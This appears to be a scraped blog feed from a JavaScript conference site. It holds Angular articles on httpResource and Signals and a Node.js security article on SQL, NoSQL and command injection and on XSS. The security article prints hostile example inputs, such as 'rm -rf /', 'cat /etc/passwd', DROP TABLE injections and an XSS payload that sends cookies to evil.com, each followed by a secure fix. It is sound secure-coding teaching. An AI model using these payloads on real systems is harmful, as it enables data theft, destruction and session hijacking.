  const level = this.levelResource.value();
  const canvas = this.canvas()?.nativeElement;
  const animation = this.animation();

  if (!tiles || !canvas) {
    return;
  }

  if (animation) {
    animateLevel({
      canvas,
      level,
      tiles,
    });
  } else {
    renderLevel({
      canvas,
      level,
      tiles,
    });
  }
}

Resources and missing parameters

The tilesResource shown in the diagram discussed is simply delegated to the asynchronous extractTiles function, which the engine also provides (Listing 8).

Listing 8:

function createTilesResource(
  tilesMapResource: HttpResourceRef<Blob | undefined>,
  style: () => Style
) {
  const tilesMap = tilesMapResource.value();

  // undefined prevents the resource from beeing triggered
  const request = computed(() =>
    !tilesMap
      ? undefined
      : {
          tilesMap: tilesMap,
          style: style(),
        }
  );

  return resource({
    request,
    loader: (params) => {
      const { tilesMap, style } = params.request!;
      return extractTiles(tilesMap, style);
    },
  });
}

This simple resource contains an interesting detail: before the tilemap is loaded, the tilesMapResource has the value undefined. However, we cannot call extractTiles without a tilesMap. The request signal takes this into account: it returns undefined if no tilesMap is available yet, so the resource does not trigger its loader.

iJS Newsletter

Keep up with JavaScript’s latest news!

Displaying Progress

The tilesMapResource was configured above to provide information about the download progress via its progress signal. A calculated signal in the LevelComponent projects it into a string for display (Listing 9).

Listing 9:

function calcProgress(progress: HttpProgressEvent | undefined): string {
  if (!progress) {
    return "-";
  }

  if (progress.total) {
    const percent = Math.round((progress.loaded / progress.total) * 100);
    return percent + "%";
  }

  const kb = Math.round(progress.loaded / 1024);
  return kb + " KB";
}

If the server reports the file size, this function calculates a percentage for the portion already downloaded. Otherwise, it just returns the number of kilobytes already downloaded. There is no progress information before the download starts. In this case, only a hyphen is used.

To test this function, it makes sense to throttle the browser’s network connection in the developer console and press the reload button in the application to instruct the resources to reload the data.

Status, header, error, and more

In case the application needs the status code or the headers of the HTTP response, the httpResource provides the corresponding signals:

console.log(this.levelOverviewResource.status());
console.log(this.levelOverviewResource.statusCode());
console.log(this.levelOverviewResource.headers()?.keys());

In addition, the httpResource provides everything that is also known from ordinary resources, including an error signal that provides information about any errors that may have occurred, as well as the option to update the value that is available as a local working copy.

Conclusion

The new httpResource is another building block that complements Angular’s new signal story. It allows data to be loaded within the reactive graph. Currently, it uses the HttpClient as an implementation detail, which may eventually be replaced by another solution at a later date.

While the HTTP resource also allows data to be retrieved using HTTP verbs other than GET, it is not designed to write data back to the server. This task still needs to be done in the conventional way.

The post Exploring httpResource in Angular 19.2 appeared first on International JavaScript Conference.

]]>
Common Vulnerabilities in Node.js Web Applications https://javascript-conference.com/blog/node-js-security-vulnerabilities-sql-xss-prevention/ Wed, 23 Apr 2025 07:44:46 +0000 https://javascript-conference.com/?p=107761 As Node.js is widely used to develop scalable and efficient web applications, understanding its vulnerabilities is crucial. In this article, we will explore common security risks, such as SQL injections and XSS attacks, and offer practical strategies to prevent them. By applying these insights, you'll learn how to protect user data and build more secure and reliable applications.

The post Common Vulnerabilities in Node.js Web Applications appeared first on International JavaScript Conference.

]]>
Node.js Overview

Node.js is an open source cross platform server environment that enables server side JavaScript. It has been in existence for a few years now and has grown to be a favorite among developers when it comes to building scalable and efficient web applications. Node.js is built on Chrome’s V8 JavaScript engine, which provides better speed and performance.

The other important feature of Node.js is its non-blocking, event-driven architecture. This model has enabled Node.js to work well with many concurrent connections and, for this reason, has been applied in real-time applications including chat applications, online gaming, and live streaming. Its use of the familiar JavaScript language also enhances its adoption.

"Diagram illustrating the Node.js system architecture, showing the interaction between the V8 JavaScript engine, Node.js bindings, the Libuv library, event loop, and asynchronous I/O operations including worker threads for file system, network, and process tasks.

Node.js Architecture

The Node.js architecture is designed to optimize performance and efficiency. It employs an event-driven, non-blocking I/O model to efficiently handle many tasks at a time without being slowed down by I/O operations.

Here are the main components of Node.js architecture:

  • Event Loop: The event loop is the heart of Node.js. It’s in charge of coordinating asynchronous I/O operations and preventing the application from becoming unresponsive. Node.js performs an asynchronous operation, such as file read or network request, and registers a callback function; then it carries on executing other code. Once the operation is complete, the callback function is queued up in the event loop, which then calls it.
  • Non-blocking I/O: Node.js uses non-blocking I/O operations so that the application does not become unresponsive when performing time-consuming operations. Node.js does not block the thread and wait for the operation to finish; instead, it carries on executing other code. This makes Node.js able to perform many tasks simultaneously, which is very beneficial.
  • Modules and Packages: Node.js has a large number of modules and packages that can be loaded into an application quite easily. The Node Package Manager (NPM) is currently the largest repository of open source software libraries in the world and is a treasure trove of modules that can help make your application better. However, the use of third-party packages also implies certain risks; if there is a vulnerability in a package, it can be easily exploited by an attacker.

Why Security is Crucial for Node.js Applications

As the usage of Node.js keeps on increasing, so does the need for strong security measures. The security of Node.js applications is important for several reasons:

  • Protecting Sensitive Data: Web applications are likely to deal with sensitive data including personal information, financial information and login credentials. The security of this data has to be secured to prevent unauthorized access and data breaches.
  • Maintaining User Trust: Users expect that their data and activity on an application is secure. A security breach can jeopardize users’ trust and the reputation of the organization.
  • Compliance with Regulations: Many industries are strictly regulated in respect to data security and privacy. It is necessary to make sure that Node.js applications are compliant with such rules in order to avoid legal consequences and financial penalties.
  • Preventing Financial Loss: Security breaches are costly to organizations in terms of dollars and cents. These losses can be in the form of direct costs, such as fines and legal expenses, and indirect costs, including lost revenue and damage to the brand.
  • Mitigating Risks from Third-Party Packages: The use of third-party packages is common in Node.js applications, posing security risks. Flaws in these packages can be exploited by attackers to take over the application. It is crucial to update and scan these packages frequently to reduce these risks.

Common Vulnerabilities in Node.js Applications

Injection Attacks – SQL Injection

Overview: An SQL injection is a type of attack where an attacker can execute malicious SQL statements that control a web application’s database server. This is typically done by inserting or “injecting” malicious SQL code into a query.

Scenario 1: Consider a simple login form where a user inputs their username and password. The server-side code might look something like this:

const username = req.body.username;

const password = req.body.password;

const query = `SELECT * FROM users WHERE username = '${username}' AND password = '${password}'`;

db.query(query, (err, result) => {

  if (err) throw err;

  // Process result

});

If an attacker inputs admin’ — as the username and leaves the password blank, the query becomes:

SELECT * FROM users WHERE username = 'admin' --' AND password = ''

The — sequence comments out the rest of the query, allowing the attacker to bypass authentication.

Solution: To prevent SQL injection, use parameterized queries or prepared statements. This ensures that user input is treated as data, not executable code.

const username = req.body.username;

const password = req.body.password;

const query = 'SELECT * FROM users WHERE username = ? AND password = ?';

db.query(query, [username, password], (err, result) => {

  if (err) throw err;

  // Process result

});

Scenario 2: Consider a simple Express application that retrieves a user from a database:

const express = require('express');

const mysql = require('mysql');

const app = express();

// Database connection

const connection = mysql.createConnection({

  host: 'localhost',

  user: 'root',

  password: 'password',

  database: 'users_db'

});

app.get('/user', (req, res) => {

  const userId = req.query.id;

  

  // VULNERABLE CODE: Direct concatenation of user input

  const query = "SELECT * FROM users WHERE id = " + userId;

  

  connection.query(query, (err, results) => {

    if (err) throw err;

    res.json(results);

  });

});

app.listen(3000);

The Attack

An attacker can exploit this by making a request like:

GET /user?id=1 OR 1=1

The resulting query becomes:

SELECT * FROM users WHERE id = 1 OR 1=1

Since 1=1 is always true, this returns ALL users in the database, exposing sensitive information.

More dangerous attacks might include:

GET /user?id=1; DROP TABLE users; --

Which attemps to delete the entire user’s table.

Secure Solution

Here’s how to fix the vulnerability using parameterized queries:

app.get('/user', (req, res) => {

  const userId = req.query.id;

  

  // SECURE CODE: Using parameterized queries

  const query = "SELECT * FROM users WHERE id = ?";

  

  connection.query(query, [userId], (err, results) => {

    if (err) throw err;

    res.json(results);

  });

});

Best Practices to Prevent SQL Injection

  1. Use Parameterized Queries: Always use parameter placeholders (?) and pass values separately.
  2. ORM Libraries: Consider using ORM libraries like Sequelize or Prisma that handle parameterization automatically.
  3. Input Validation: Validate user input (type, format, length) before using it in queries.
  4. Principle of Least Privilege: Database users should have minimal permissions needed for the application.

EVERYTHING AROUND NODEJS

Explore the iJS Node.js & Backend Track

NoSQL Injection

Overview: NoSQL injection is similar to SQL injection but targets NoSQL databases like MongoDB. Attackers can manipulate queries to execute arbitrary commands.

Scenario 1: Consider a MongoDB query to find a user by username and password:

const username = req.body.username;

const password = req.body.password;

User.findOne({ username: username, password: password }, (err, user) => {

  if (err) throw err;

  // Process user

});

The Attack

If an attacker inputs { “$ne”: “” } as the password, the query becomes:

User.findOne({ username: 'admin', password: { "$ne": "" } }, (err, user) => {

  if (err) throw err;

  // Process user

});

This query returns the first user where the password is not empty, potentially bypassing authentication.

Solution: To prevent NoSQL injection, sanitize user inputs and use libraries like mongo-sanitize to remove any characters that could be used in an injection attack.

const sanitize = require('mongo-sanitize');

const username = sanitize(req.body.username);

const password = sanitize(req.body.password);

User.findOne({ username: username, password: password }, (err, user) => {

  if (err) throw err;

  // Process user

});

Scenario 2: Consider a Node.js application that allows users to search for products with filtering options:

app.post('/products/search', async (req, res) => {

  const { category, sortField } = req.body;

  

  // VULNERABLE CODE: Directly using user input in aggregation pipeline

  const pipeline = [

    { $match: { category: category } },

    { $sort: { [sortField]: 1 } }, // Dangerous!

    { $limit: 20 }

  ];

  

  try {

    const products = await productsCollection.aggregate(pipeline).toArray();

    res.json(products);

  } catch (err) {

    res.status(500).json({ error: err.message });

  }

});

The Attack

An attacker could send a malicious payload:

{

  "category": "electronics",

  "sortField": "$function: { body: function() { return  db.getSiblingDB('admin').auth('admin', 'password') } }"

}

This attempts to execute arbitrary JavaScript in the MongoDB server through the $function operator, potentially allowing database access control bypass or even server-side JavaScript execution.

Secure Solution

Here’s the fixed version:

app.post('/products/search', async (req, res) => {

  const { category, sortField } = req.body;  

  // Validate category

  if (typeof category !== 'string') {

    return res.status(400).json({ error: "Invalid category format" });

  }  

  // Validate sort field against allowlist

  const allowedSortFields = ['name', 'price', 'rating', 'date_added'];

  if (!allowedSortFields.includes(sortField)) {

    return res.status(400).json({ error: "Invalid sort field" });

  }  

  // SECURE CODE: Using validated input

  const pipeline = [

    { $match: { category: category } },

    { $sort: { [sortField]: 1 } },

    { $limit: 20 }

  ]; try {

    const products = await productsCollection.aggregate(pipeline).toArray();

    res.json(products);

  } catch (err) {

    res.status(500).json({ error: "An error occurred" });

  }

});

Key Takeaways:

  1. Validates the data type of the category parameter.
  2. Uses an allowlist approach for sortField, restricting possible values.
  3. Avoids exposing detailed error information to potential attackers.

Command Injection

Overview: Command injection occurs when an attacker can execute arbitrary commands on the host operating system via a vulnerable application. This typically happens when user input is passed directly to a system shell.

Example: Consider a Node.js application that uses the exec function to list files in a directory:

const { exec } = require('child_process');

const dir = req.body.dir;

exec(`ls ${dir}`, (err, stdout, stderr) => {

  if (err) throw err;

  // Process stdout

});

If an attacker inputs ; rm -rf /, the command becomes:

ls ; rm -rf /

This command lists the directory contents and then deletes the root directory, causing significant damage.

Solution: To prevent command injection, avoid using exec with unsanitized user input. Use safer alternatives like execFile or spawn, which do not invoke a shell.

const { execFile } = require('child_process');

const dir = req.body.dir;

execFile('ls', [dir], (err, stdout, stderr) => {

  if (err) throw err;

  // Process stdout

});

Scenario 2: Consider a Node.js application that allows users to ping a host to check connectivity:

const express = require('express');

const { exec } = require('child_process');

const app = express();

app.use(express.urlencoded({ extended: true }));

app.get('/ping', (req, res) => {

  const hostInput = req.query.host;

  

  // VULNERABLE CODE: Direct concatenation of user input into command

  const command = 'ping -c 4 ' + hostInput;

  

  exec(command, (error, stdout, stderr) => {

    if (error) {

      res.status(500).send(`Error: ${stderr}`);

      return;

    }

    res.send(`<pre>${stdout}</pre>`);

  });

});

app.listen(3000);

The Attack

An attacker could exploit this vulnerability by providing a malicious input:

/ping?host=google.com; cat /etc/passwd

The resulting command becomes:

ping -c 4 google.com; cat /etc/passwd

This would execute the ping command followed by displaying the contents of the system’s password file, potentially exposing sensitive information.

/ping?host=;rm -rf /*

Which attempts to delete all files on the system (assuming adequate permissions).

Secure Solution

Here’s how to fix the vulnerability:

const express = require('express');

const { execFile } = require('child_process');

const app = express();

app.use(express.urlencoded({ extended: true }));

app.get('/ping', (req, res) => {

  const hostInput = req.query.host;

  

  // Input validation: Basic hostname format check

  if (!/^[a-zA-Z0-9][a-zA-Z0-9\.-]+$/.test(hostInput)) {

    return res.status(400).send('Invalid hostname format');

  }

  

  // SECURE CODE: Using execFile which doesn't invoke shell

  execFile('ping', ['-c', '4', hostInput], (error, stdout, stderr) => {

    if (error) {

      res.status(500).send('Error executing command');

      return;

    }

    res.send(`<pre>${stdout}</pre>`);

  });

});

app.listen(3000);

Best Practices to Prevent Command Injection

  1. Avoid shell execution: Use execFile or spawn instead of exec when possible, as they don’t invoke a shell.
  2. Input validation: Implement strict validation of user input using regex or other validation methods.
  3. Allowlists: Use allowlists to restrict inputs to known-good values.
  4. Use built-in APIs: When possible, use Node.js built-in modules instead of executing system commands.
  5. Principle of least privilege: Run your Node.js application with minimal required system permissions.

iJS Newsletter

Keep up with JavaScript’s latest news!

Cross-Site Scripting (XSS) Attacks

This is a kind of security vulnerability that is most often seen in web applications. It allows attackers to inject malicious scripts into web pages that other users view. These scripts can then be executed in the context of the victim’s browser, resulting in potential data theft, session hijacking and other malicious activities. An XSS vulnerability occurs when an application uses unvalidated input in creating a web page.

How XSS Occurs

XSS attacks happen when the attacker is able to inject malicious scripts into a web application and the scripts get executed in the victim’s browser, thus making the attacker perform actions on behalf of the user or even steal sensitive information.

How XSS Occurs in Node.js

XSS attacks can occur in Node.js applications when user input is not properly sanitized or encoded before being included in the HTML output. This can happen in various scenarios, such as displaying user comments, search results, or any other dynamic content.

Types of XSS Attacks

XSS vulnerabilities can be classified into three primary types:

  • Reflected XSS: The malicious script is reflected off a web server, such as in an error message or search result, and is immediately executed by the user’s browser.
  • Stored XSS: The malicious script is stored on the server, such as in a database, and is executed whenever the data is retrieved and displayed to users.
  • DOM-Based XSS: The vulnerability exists in the client-side code rather than the server-side code, and the malicious script is executed as a result of modifying the DOM environment.

Scenario 1: Consider a Node.js application that displays user comments without proper sanitization:

const express = require('express');

const app = express();

app.use(express.urlencoded({ extended: true }));

app.post('/comment', (req, res) => {

  const comment = req.body.comment;

  res.send(`<div><p>User comment: ${comment}</p></div>`);

});

app.listen(3000, () => {

  console.log('Server is running on port 3000');

});

If an attacker submits a comment containing a malicious script, such as:

<script>alert('XSS');</script>

The application will render the comment as:

<div>

  <p>User comment: <script>alert('XSS');</script></p>

</div>

When another user views the comment, the script will execute, displaying an alert box with the message “XSS”.

Prevention Techniques

To prevent XSS attacks in Node.js applications, developers should implement the following techniques:

  • Input Validation: Ensure that all user inputs are validated to conform to expected formats. Reject any input that contains potentially malicious content.
  • Output Encoding: Encode user inputs before displaying them in the browser. This ensures that any special characters are treated as text rather than executable code.
onst express = require('express');

const app = express();

const escapeHtml = require('escape-html');

app.use(express.urlencoded({ extended: true }));

app.post('/comment', (req, res) => {

  const comment = escapeHtml(req.body.comment);

  res.send(`<div><p>User comment: ${comment}</p></div>`);

});

app.listen(3000, () => {

  console.log('Server is running on port 3000');

});

Here, escapeHtml is a function that converts special characters to their HTML entity equivalents.

  • Content Security Policy (CSP): Implement a Content Security Policy to restrict the sources from which scripts can be loaded. This helps prevent the execution of malicious scripts.
  • HTTP-Only and Secure Cookies: Use HTTP-only and secure flags for cookies to prevent them from being accessed by malicious scripts.
res.cookie('session', sessionId, { httpOnly: true, secure: true });

Scenario 2: Reflected XSS in a Search Feature

Here’s a simple Express application with an XSS vulnerability:

const express = require('express');

const app = express();

app.get('/search', (req, res) => {

  const searchTerm = req.query.q;

  

  // VULNERABLE CODE: Directly embedding user input in HTML response

  res.send(`

    <h1>Search Results for: ${searchTerm}</h1>

    <p>No results found.</p>

    <a href="/">Back to home</a>

  `);

});

app.listen(3000);

The Attack

An attacker could craft a malicious URL:

/search?q=<script>document.location='https://evil.com/stealinfo.php?cookie='+document.cookie</script>

When a victim visits this URL, the script executes in their browser, sending their cookies to the attacker’s server. This could lead to session hijacking and account takeover.

Secure Solutions

  1. Output Encoding
const express = require('express');

const app = express();

app.get('/search', (req, res) => {

  const searchTerm = req.query.q || ''; 

  // SECURE CODE: Encoding special characters

  const encodedTerm = searchTerm

    .replace(/&/g, '&amp;')

    .replace(/</g, '&lt;')

    .replace(/>/g, '&gt;')

    .replace(/"/g, '&quot;')

    .replace(/'/g, '&#039;');

  res.send(`

    <h1>Search Results for: ${encodedTerm}</h1>

    <p>No results found.</p>

    <a href="/">Back to home</a>

  `);

});

2. Using Template Engines

const express = require('express');

const app = express();

app.set('view engine', 'ejs');

app.set('views', './views');

app.get('/search', (req, res) => {

  const searchTerm = req.query.q || '';

  

  // SECURE CODE: Using EJS template engine with automatic escaping

  res.render('search', { searchTerm });

});

3. Using Content Security Policy

const express = require('express');

const helmet = require('helmet');

const app = express();

// Add Content Security Policy headers

app.use(helmet.contentSecurityPolicy({

  directives: {

    defaultSrc: ["'self'"],

    scriptSrc: ["'self'"],

    styleSrc: ["'self'"],

  }

}));

app.get('/search', (req, res) => {

  // Even with encoding, adding CSP provides defense in depth

  const searchTerm = req.query.q || '';

  const encodedTerm = searchTerm

    .replace(/&/g, '&amp;')

    .replace(/</g, '&lt;')

    .replace(/>/g, '&gt;');

  

  res.send(`

    <h1>Search Results for: ${encodedTerm}</h1>

    <p>No results found.</p>

    <a href="/">Back to home</a>

  `);

});

Best Practices to Prevent XSS

  • Context-appropriate encoding: Only display output encoded according to what it is to be used for HTML, JavaScript, CSS, or URL.
  • Use security libraries: When using HTML, it’s better to use DOMPurify, js-xss or sanitize-html.
  • Content Security Policy: CSP headers can also be used to restrict where scripts come from and when they can be executed.
  • Use modern frameworks: Some frameworks like React, Vue or Angular will encode output for you.
  • X-XSS-Protection: This header should be used to enable browser’s built in XSS filters.
  • HttpOnly cookies: Designate sensitive cookies as HttpOnly to prevent them from being accessed by JavaScript.

Following these practices will go a long way in ensuring that your Node.js applications are secure against XSS attacks, which are still very frequent in web applications.

EVERYTHING AROUND NODEJS

Explore the iJS Node.js & Backend Track

Conclusion

Security requires a comprehensive approach addressing all potential vulnerabilities. We discussed two of the most common threats that affect web applications:

SQL Injection

We explained how unsanitized user input in database queries can result in unauthorized data access or manipulation. To protect your applications:

  • Instead of string concatenation, use parameterized queries.
  • Secure ORMs are also available.
  • All user inputs should be validated before processing.
  • Apply the principle of least privilege for database access

Cross-Site Scripting (XSS)

We looked at how reflected XSS in a search feature can allow attackers to inject malicious scripts that are executed in users’ browsers. Essential defensive measures include:

  • Encoding of output where appropriate
  • Security libraries for HTML sanitization
  • Content Security Policy headers
  • Frameworks that offer protection against XSS
  • HttpOnly cookies for sensitive data.

The post Common Vulnerabilities in Node.js Web Applications appeared first on International JavaScript Conference.

]]>
Professional Tips for Using Signals in Angular https://javascript-conference.com/blog/signals-angular-tips/ Wed, 05 Mar 2025 13:30:01 +0000 https://javascript-conference.com/?p=107575 Signals in Angular offer a powerful yet simple reactive programming model, but leveraging them effectively requires a solid understanding of best practices. In this guide, we explore expert techniques for using Signals in unidirectional data flow, integrating them with RxJS, avoiding race conditions, and optimizing performance. Whether you're new to Signals or looking to refine your approach, these professional tips will help you build seamless and efficient Angular applications.

The post Professional Tips for Using Signals in Angular appeared first on International JavaScript Conference.

]]>
The new Signals in Angular are a simple reactive building block. However, as is so often the case, the devil is in the detail. In this article, I will give three tips to help you use Signals in a more straightforward way. The examples used for this can be found here.

Guiding theory: Unidirectional data flow with signals

The approach for establishing a unidirectional data flow (Fig. 1) serves as the guiding theory for my three tips.

Fig. 1: Signals in Angular-Unidirectional data flow with a store

Fig. 1: Unidirectional data flow with a store

Handlers for UI events delegate to the store. I use the abstract term “intention”, since this process is different for different stores. With the Redux-based NgRx store, actions are dispatched; whereas with the lightweight NgRx Signal store, the component calls a method offered by the store.

The store executes synchronous or asynchronous tasks. These usually lead to a status change, which the application transports to the views of the individual components with signals. As part of this data flow, the state can be projected onto view models using computed, i.e. onto data structures that represent the view of individual use cases on the state.

This approach is based on the fact that signals are primarily suitable for informing the view synchronously about data and data changes. They are less suitable for asynchronous tasks and for representing events. For one, they don’t offer a simple way of dealing with overlapping asynchronous requests and the resulting race conditions. Furthermore, they cannot directly represent error states. Second, signals ignore the resulting intermediate states in the case of directly consecutive value changes. This desired property is called “glitch free”.

For example, if a signal changes from 1 to 2 and immediately afterwards from 2 to 3, the consumer only receives a notification about the 3. This is also conducive to data binding performance, especially as updating with intermediate results would result in an unnecessary performance overhead.

iJS Newsletter

Keep up with JavaScript’s latest news!

Tip 1: Signals harmonize with RxJS

Signals are deliberately kept simple. That’s why it offers fewer options than RxJS, which has been established in the Angular world for years. Thanks to the RxJS interop that Angular provides, the best of both worlds can be combined. Listing 1 demonstrates this. It converts the signals from and to into observables and implements a typeahead based on them. To do this, it uses the operators filter, debounceTime and switchMap provided by RxJS. The latter prevents race conditions for overlapping requests by only using the most recent request. SwitchMap aborts requests that have already been started, unless they have already been completed.

Listing 1

@Component({
  selector: 'app-desserts',
  standalone: true,
  imports: [DessertCardComponent, FormsModule, JsonPipe],
  templateUrl: './desserts.component.html',
  styleUrl: './desserts.component.css',
  changeDetection: ChangeDetectionStrategy.OnPush,
})
export class DessertsComponent {
  #dessertService = inject(DessertService);
  #ratingService = inject(RatingService);
  #toastService = inject(ToastService);

  originalName = signal('');
  englishName = signal('Cake');
  loading = signal(false);

  ratings = signal<DessertIdToRatingMap>({});
  ratedDesserts = computed(() => this.toRated(this.desserts(), this.ratings()));

  originalName$ = toObservable(this.originalName);
  englishName$ = toObservable(this.englishName);

  desserts$ = combineLatest({
    originalName: this.originalName$,
    englishName: this.englishName$,
  }).pipe(
    filter((c) => c.originalName.length >= 3 || c.englishName.length >= 3),
    debounceTime(300),
    tap(() => this.loading.set(true)),
    switchMap((c) =>
      this.#dessertService.find(c).pipe(
        catchError((error) => {
          this.#toastService.show('Error loading desserts!');
          console.error(error);
          return of([]);
        }),
      ),
    ),
    tap(() => this.loading.set(false)),
  );

  desserts = toSignal(this.desserts$, {
    initialValue: [],
  });
  
  […]
}

At the end, the resulting observable is converted into a signal so that the application can continue with the new Signals API. For performance reasons, the application should not switch between the two worlds too frequently.

In contrast to Figure 1, no store is used. Both the intention and the asynchronous action take place in the reactive data flow. If the data flow were outsourced to a service and the loaded data were shared with the shareReplay operator, this service could be regarded as a simple store. However, in line with Figure 1, the component already hands over the execution of asynchronous tasks in the expansion stage shown and receives signals at the end.

EVERYTHING AROUND ANGULAR

Explore the iJS Angular Development Track

RxJS in Stores

RxJS is also frequently used in stores, like in NgRx in combination with Effects. Instead, the NgRx Signal Store offers its own reactive methods that can be defined with rxMethod (Listing 2).

Listing 2

export const DessertStore = signalStore(
  { providedIn: 'root' },
  withState({
    filter: {
      originalName: '',
      englishName: 'Cake',
    },
    loading: false,
    ratings: {} as DessertIdToRatingMap,
    desserts: [] as Dessert[],
  }),
  […]
  withMethods(
    (
      store,
      dessertService = inject(DessertService),
      toastService = inject(ToastService),
    ) => ({
      
      […]
      loadDessertsByFilter: rxMethod<DessertFilter>(
        pipe(
          filter(
            (f) => f.originalName.length >= 3 || f.englishName.length >= 3,
          ),
          debounceTime(300),
          tap(() => patchState(store, { loading: true })),
          switchMap((f) =>
            dessertService.find(f).pipe(
              tapResponse({
                next: (desserts) => {
                  patchState(store, { desserts, loading: false });
                },
                error: (error) => {
                  toastService.show('Error loading desserts!');
                  console.error(error);
                  patchState(store, { loading: false });
                },
              }),
            ),
          ),
        ),
      ),
    }),
  ),
  withHooks({
    onInit(store) {
      const filter = store.filter;
      store.loadDessertsByFilter(filter);
    },
  }),
);

This example sets up a reactive method loadDessertsByFilter in the store. As it is defined with rxMethod, it receives an observable. The values of this observable pass through the defined pipe. As rxMethod automatically logs on to this observable, the application code must receive the result of the data flow using tap or tabResponse. The latter is an operator from the @ngrx/operators package that combines the functionality of tap, catchError and finalize.

The consumer of a reactive method can pass a corresponding observable as well as a signal or a specific value. The onInit hook shown passes the filter signal. This means all values that the signal gradually picks up pass through the pipe in loadDessertsByFilter. This is where the glitch-free property comes into play.

It is interesting to note that rxMethod can also be used outside the signal store by design. For example, a component could use it to set up a reactive method.

Tip 2: Avoiding race conditions

Overlapping, asynchronous operations usually lead to undesirable race conditions. If users search for two different desserts in quick succession, both results are displayed one after the other. One of the two only flashes briefly before the other replaces it. Due to the asynchronous nature, the order of the search queries doesn’t have to match each of the results obtained.

To prevent this confusing behavior, RxJS offers a few flattening operators:

  • switchMap
  • mergeMap
  • concatMap
  • exhaustMap

These operators differ in how they deal with overlapping requests. The switchMap only deals with the last search request. It cancels any queries that are already running when a new query arrives. This behavior corresponds to what users intuitively expect when working with search filters.

The mergeMap and concatMap operators execute all requests: the former in parallel and the latter sequentially. The exhaustMap operator ignores further requests as long as one is running. These options are another reason for using RxJS and for the RxJS interop and rxMethod.

Another strategy often used in addition or as an alternative is a flag that indicates if the application is currently communicating with the backend.

Listing 3

loadRatings(): void {
  patchState(store, { loading: true });

  ratingService.loadExpertRatings().subscribe({
    next: (ratings) => {
      patchState(store, { ratings, loading: false });
    },
    error: (error) => {
      patchState(store, { loading: false });
      toastService.show('Error loading ratings!');
      console.error(error);
    },
  });
},

Depending on the flag’s value, the application can display a loading indicator or deactivate the respective button. The latter is counterproductive or even impossible with a highly reactive UI if the application can manage without an explicit button.

Tip 3: Signals as triggers

As mentioned earlier, Signals are especially suitable for transporting data to the view, like what’s seen on the right in Figure 1. Real events, UI events, or events displayed with RxJS are the better solution for transmitting an intention. There are several reasons why: First, Signals’ glitch-free property can reduce consecutive changes to the last change.

Consumers must subscribe to the Signal in order to be able to react to value changes. This requires an effect that triggers the desired action and writes the result to a signal. Effects that write to Signals are not welcome. By default, they are even penalized by Angular with an exception. The Angular team wants to avoid confusing reactive chains – changes that lead to changes, which in turn, lead to further changes.

On the other hand, Angular is converting more and more APIs to signals. One example is Signals that can be bound to form fields or Signals that represent passed values (inputs). In most cases, you could argue that instead of listening for the Signal, you can also use the event that led to the Signal change. But in some cases, this is a detour that bypasses the new signal-based APIs.

Listing 4 shows an example of a component that receives the ID of a data set to be displayed as an input signal. The router takes this ID from a routing parameter. This is possible with the relatively new feature withComponentInputBinding.

Listing 4

@Component({ […] })
export class DessertDetailComponent implements OnChanges {

  store = inject(DessertDetailStore);

  dessert = this.store.dessert;
  loading = this.store.loading;

  id = input.required({
    transform: numberAttribute
  });
  
  […]
}

This component’s template lets you scroll between the data records. This logic is deliberately implemented very simply for this example:

<button [routerLink]="['..', id() + 1]" >
  Next
</button>

When scrolling, the input signal id receives a new value. Now, the question arises as to how to trigger the loading of the respective data set in the event of this kind of change. The classic procedure is using the live cycle hook ngOnChanges:

ngOnChanges(): void {
  const id = this.id();
  this.store.load(id);
}

For the time being, there’s nothing wrong with this. However, the planned signal-based components will no longer offer this lifecycle hook. The RFC provides using effects as a replacement.

To escape this dilemma, an rxMethod (e.g. offered by a signal store) can be used:

constructor() {
  this.store.rxLoad(this.id);
}

It should be noted that the constructor transfers the entire signal and not just its current value. The rxMethod subscribes to this Signal and forwards its values to an observable that is used within the rxMethod.

If you don’t want to use the signal store, you can instead use the RxJS interop discussed above and convert the signal into an observable with toObservable.

If you don’t have a reactive method to hand, you might be tempted to define an effect for this task:

constructor() {
  effect(() => {
    this.store.load(this.id());
  });
}

Unfortunately, this leads to the exception in Figure 2.

Fig. 2: Signals in Angular-Error message when using effect.

Fig. 2: Error message when using effect

This problem arises because the entire load method that writes a Signal in the store is executed in the reactive context of the effect. This means that Angular recognizes an effect that writes to a Signal. This has to be prevented by default for the reasons above. It also means that Angular triggers the effect again even if a Signal read in load changes.

Both problems can be prevented by using the untracked function (Listing 5).

Listing 5

constructor() {
  // try to avoid this
  effect(() => {
    const id = this.id();
    untracked(() => {
      this.store.load(id);
    });
  });
}

With this common pattern, untracked ensures that the reactive context does not spill over to the load method. It can write to Signals and the effect doesn’t register for Signals that read load. Angular only triggers the effect again when the Signal id changes, especially since it reads it outside of untracked.

Unfortunately, this code is not especially easy to read. It’s a good idea to hide it behind a helper function:

constructor() {
  explicitEffect(this.id, (id) => {
    this.store.load(id);
  });
}

The created auxiliary function explicitEffect receives a signal and subscribes to it with an effect. The effect triggers the transferred lambda expression using untracked (Listing 6).

Listing 6

import { Signal, effect, untracked } from "@angular/core";

export function explicitEffect<T>(source: Signal<T>, action: (value: T) => void) {
  effect(() => {
    const s = source();
    untracked(() => {
      action(s)
    });
  });
}

Interestingly, the explicit definition of Signals to be obeyed corresponds to the standard behavior of effects in other frameworks, like Solid. The combination of effect and untracked shown is also used in many libraries. Examples include the classic NgRx store, the RxJS interop mentioned above, the rxMethod, or the open source library ngxtension, which offers many extra functions for Signals.

iJS Newsletter

Keep up with JavaScript’s latest news!

To summarize

RxJS and Signals harmonize wonderfully together and the RxJS interop from Angular gives us the best of both worlds. Using RxJS is recommended for representing events. For processing asynchronous tasks, RxJS or stores (which can be based on RxJS) are recommended. The synchronous transport of data to the view should be handled by Signals. Together, RxJS, stores, and Signals are the building blocks for establishing a unidirectional data flow.

The flattening operators in RxJS can also elegantly avoid race conditions. Alternatively or in addition to this, flags can be used to indicate if a request is currently in progress at the backend.

Even if Signals weren’t primarily created to display events, there are cases when you want to react to changes in a Signal. This is the case with framework APIs based on Signals. In addition to the RxJS interop, the rxMethod from the Signal Store can also be used. Another option is the effect/untracked pattern for implementing effects that only react to explicitly named Signals.

The post Professional Tips for Using Signals in Angular appeared first on International JavaScript Conference.

]]>
Shareable Modals in Next.js: URL-Synced Overlays Made Easy https://javascript-conference.com/blog/shareable-modals-nextjs/ Mon, 17 Feb 2025 14:03:07 +0000 https://javascript-conference.com/?p=107476 Modals are a cornerstone of interactive web applications. However, managing their state, making them shareable, and preserving navigation can be complex. Next.js simplifies this with intercepting and parallel routes, enabling deep-linked, URL-synced modals. Together, we’ll build a dynamic feedback modal system with TailwindCSS that can be accessed, shared, and navigated effortlessly, improving both user experience and developer productivity.

The post Shareable Modals in Next.js: URL-Synced Overlays Made Easy appeared first on International JavaScript Conference.

]]>
